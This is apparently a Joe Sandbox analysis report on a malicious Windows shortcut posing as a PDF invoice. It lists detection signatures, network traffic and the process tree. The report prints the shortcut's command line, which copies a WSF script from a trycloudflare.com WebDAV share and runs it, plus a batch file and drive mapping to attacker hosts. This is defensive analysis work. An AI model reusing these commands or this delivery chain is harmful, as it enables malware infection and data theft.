Edit tour

Windows Analysis Report
DE-10192.pdf.lnk.download.lnk

Overview

General Information

Sample name:	DE-10192.pdf.lnk.download.lnk
Analysis ID:	1637112
MD5:	d13c6bf0d56449fd952a8e26bb040fae
SHA1:	ceff34eda87c7d4b9bc002fa600f025d003963b1
SHA256:	27af6b46ac4297ad0921f014d756acb7cdecfd01cc00c746d04ac8855ebe5a99
Tags:	lnkWsgiDAVuser-JAMESWT_MHT
Infos:

Detection

Score:	92
Range:	0 - 100
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Windows shortcut file (LNK) starts blacklisted processes

Gathers information about network shares

Joe Sandbox ML detected suspicious sample

Opens network shares

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Uses an obfuscated file name to hide its real file extension (double extension)

Windows shortcut file (LNK) contains suspicious command line arguments

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Password Provided In Command Line Of Net.EXE

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Suricata IDS alerts with low severity for network traffic

Classification

Process Tree

System is w10x64

cmd.exe (PID: 1488 cmdline: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cscript.exe (PID: 7300 cmdline: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf" MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)

cmd.exe (PID: 7348 cmdline: "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chrome.exe (PID: 7492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 7752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,15765900008559282355,18116320672109493881,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2032 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

net.exe (PID: 7508 cmdline: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net.exe (PID: 1900 cmdline: net use Z: /delete /yes MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

cleanup

Sigma Signatures

System Summary

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1488, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ProcessId: 7300, ProcessName: cscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1488, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ProcessId: 7300, ProcessName: cscript.exe

Sigma detected: Password Provided In Command Line Of Net.EXE

Source: Process started

Author: Tim Shelton (HAWK.IO): Data: Command: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7348, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, ProcessId: 7508, ProcessName: net.exe

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ProcessId: 1488, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1488, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ProcessId: 7300, ProcessName: cscript.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7348, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, ProcessId: 7508, ProcessName: net.exe

Sigma detected: System Network Connections Discovery Via Net.EXE

Source: Process started

Author: frack113: Data: Command: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7348, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, ProcessId: 7508, ProcessName: net.exe

Sigma detected: Windows Share Mount Via Net.EXE

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7348, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, ProcessId: 7508, ProcessName: net.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T11:07:23.516929+0100	2028371	3	Unknown Traffic	192.168.2.10	49681	104.16.230.132	443	TCP

ET MALWARE Suspected REDCURL CnC Activity M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T11:07:43.255450+0100	2030697	1	Malware Command and Control Activity Detected	192.168.2.10	49694	104.16.230.132	443	TCP
2025-03-13T11:07:54.789267+0100	2030697	1	Malware Command and Control Activity Detected	192.168.2.10	53124	104.16.230.132	443	TCP
2025-03-13T11:07:57.253235+0100	2030697	1	Malware Command and Control Activity Detected	192.168.2.10	53131	104.16.230.132	443	TCP

Joe Security ANOMALY Microsoft Office WebDAV Discovery

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-13T11:07:24.255409+0100	1810005	1	Potentially Bad Traffic	192.168.2.10	49681	104.16.230.132	443	TCP
2025-03-13T11:07:30.002555+0100	1810005	1	Potentially Bad Traffic	192.168.2.10	49682	104.16.230.132	443	TCP
2025-03-13T11:07:49.730564+0100	1810005	1	Potentially Bad Traffic	192.168.2.10	53106	104.16.230.132	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: DE-10192.pdf.lnk.download.lnk	Virustotal: Detection: 11%			Perma Link
Source: DE-10192.pdf.lnk.download.lnk	ReversingLabs: Detection: 13%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.1% probability

Source: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf

HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53124 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.10:49681 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.10:53131 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.10:49682 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.10:53124 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.10:53106 -> 104.16.230.132:443
Source: Network traffic	Suricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.10:49694 -> 104.16.230.132:443

Source: global traffic	TCP traffic: 192.168.2.10:53104 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.10:51676 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.10:52734 -> 1.1.1.1:53

Source: Joe Sandbox View	IP Address: 162.159.134.42 162.159.134.42
Source: Joe Sandbox View	IP Address: 162.159.134.42 162.159.134.42

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49681 -> 104.16.230.132:443

Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.26
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.26
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.26
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208

Source: global traffic	HTTP traffic detected: GET /coi.wsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: typically-nut-personalized-syndication.trycloudflare.com
Source: global traffic	HTTP traffic detected: GET /xo.bat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: typically-nut-personalized-syndication.trycloudflare.com
Source: global traffic	HTTP traffic detected: GET /wp-content/uploads/2013/08/draft-invoice-Germany.pdf HTTP/1.1Host: www.healyconsultants.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.healyconsultants.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global traffic	HTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: /If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog

Source: global traffic	DNS traffic detected: DNS query: www.healyconsultants.com
Source: global traffic	DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Thu, 13 Mar 2025 10:07:51 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 91faba0cab9b0c03-DFW
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 10:07:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 91faba0cbcd2345c-DFWCF-Cache-Status: DYNAMICServer: cloudflare
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 10:07:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 91faba1afd616c81-DFWCF-Cache-Status: DYNAMICServer: cloudflare
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Thu, 13 Mar 2025 10:07:54 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 91faba1f5fbee595-DFW
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 10:07:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 91faba297e28f078-DFWCF-Cache-Status: DYNAMICServer: cloudflare

Source: net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nissan-signature-rs-noise.trycloudflare.com/
Source: net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nissan-signature-rs-noise.trycloudflare.com/O#yX
Source: net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nissan-signature-rs-noise.trycloudflare.com/ttings
Source: net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nissan-signature-rs-noise.trycloudflare.com/ue
Source: net.exe, 00000014.00000002.1436671895.000001E265719000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000014.00000002.1436912928.000001E2659F4000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492228185.000002220A374000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492189178.000002220A099000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf
Source: net.exe, 00000014.00000002.1436912928.000001E2659F4000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000014.00000002.1436671895.000001E265710000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492189178.000002220A090000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492228185.000002220A374000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfPROCESSOR_ARCHI

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49685
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49681
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53124
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53122
Source: unknown	Network traffic detected: HTTP traffic on port 53124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53128
Source: unknown	Network traffic detected: HTTP traffic on port 53128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53130
Source: unknown	Network traffic detected: HTTP traffic on port 53114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53119
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49674
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53111
Source: unknown	Network traffic detected: HTTP traffic on port 53106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53119 -> 443

Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49681 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49682 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49685 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53119 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53124 version: TLS 1.2

System Summary

Windows shortcut file (LNK) contains suspicious command line arguments

Source: DE-10192.pdf.lnk.download.lnk

LNK file: /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "%TEMP%\coi.wsf" /Y && cscript "%TEMP%\coi.wsf"

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Windows\SystemTemp\scoped_dir7492_1091332923

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\scoped_dir7492_1091332923

Jump to behavior

Source: classification engine

Classification label: mal92.spyw.evad.winLNK@30/6@6/5

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\Contacts\error_log.txt

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\coi.wsf

Jump to behavior

Source: C:\Windows\System32\cscript.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat

Source: C:\Windows\System32\conhost.exe

